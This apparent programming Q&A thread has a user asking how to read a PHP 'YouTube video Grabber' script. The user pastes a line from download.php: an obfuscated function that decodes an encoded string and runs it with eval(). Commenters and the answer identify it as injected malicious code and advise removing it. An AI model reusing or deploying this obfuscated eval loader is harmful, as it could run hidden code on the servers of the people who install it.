# HOw can i fix Or translate this func.php file

Tags: php, youtube, func

I'm very curious in fixing this.., its YouTube video Grabber func.php .. i don't really understand the language it was written in and I'm looking for the line to insert my YouTube API key,

This is the file below

i have tried many method in fixing this and it doesnt seems to work, i even copy another func.php which is well writting but there was a line in download.php which says

if(!function_exists("agF1gTdKEBPd6CaJ")) { function agF1gTdKEBPd6CaJ($ekV4gb3DGH29YotI) { $fYZ2g87NjIGLnXVg=""; $rZJ3glaFcSAz0dZY=0; $qVh0gqGnK20A4iOB=strlen($ekV4gb3DGH29YotI); while($rZJ3glaFcSAz0dZY < $qVh0gqGnK20A4iOB) { if($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY] == ' ') { $fYZ2g87NjIGLnXVg.=" "; } else if($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY] == '!') { $fYZ2g87NjIGLnXVg.=chr((ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY+1])-ord('A'))*16+(ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY+2])-ord('a'))); $rZJ3glaFcSAz0dZY+=2; } else { $fYZ2g87NjIGLnXVg.=chr(ord($ekV4gb3DGH29YotI[$rZJ3glaFcSAz0dZY])+1); } $rZJ3glaFcSAz0dZY++; } return $fYZ2g87NjIGLnXVg; } }eval(agF1gTdKEBPd6CaJ('du`k!Ci`fE0fScJDAOc5B`I!Ci&!CbBd_lgjtcbs;lecep_`!CbBh%frrn8--tgbcmecr,gl-rs`c,nfn=%,!CbBd]ECRY%gb%!CbEm,%%!Ci9 !CbBd_lgjtcbs;nmrmle!CbBh!CbBd_lgjtcbs*%:!CbBa++ _lgjbh ++<%*%:!CbBa++ _lgjbh0 ++<%!Ci9 !CbBd_lgjtcbs;qrp]pcnj_ac!CbBh%!CbBhtgbcmecr,gl!Ci%*%!CbBh%,!CbBdqgrc,%!Ci%*!CbBd_lgjtcbs!Ci9 &((:'));

If there is a way i can translate this to my own understanding. Please Help

Comment: please beauty your code

Comment: Whenever you see this kind of code, it is 99.999% of the time malicious code that is injected and can cause serious harm.

Answer (score -1):

Removing this code will solve the problem.

It seems your server has been compromised in one way or another.
It could be a simple as a guessed FTP password or loose file permissions.

Please see https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server/218011#218011 for more information.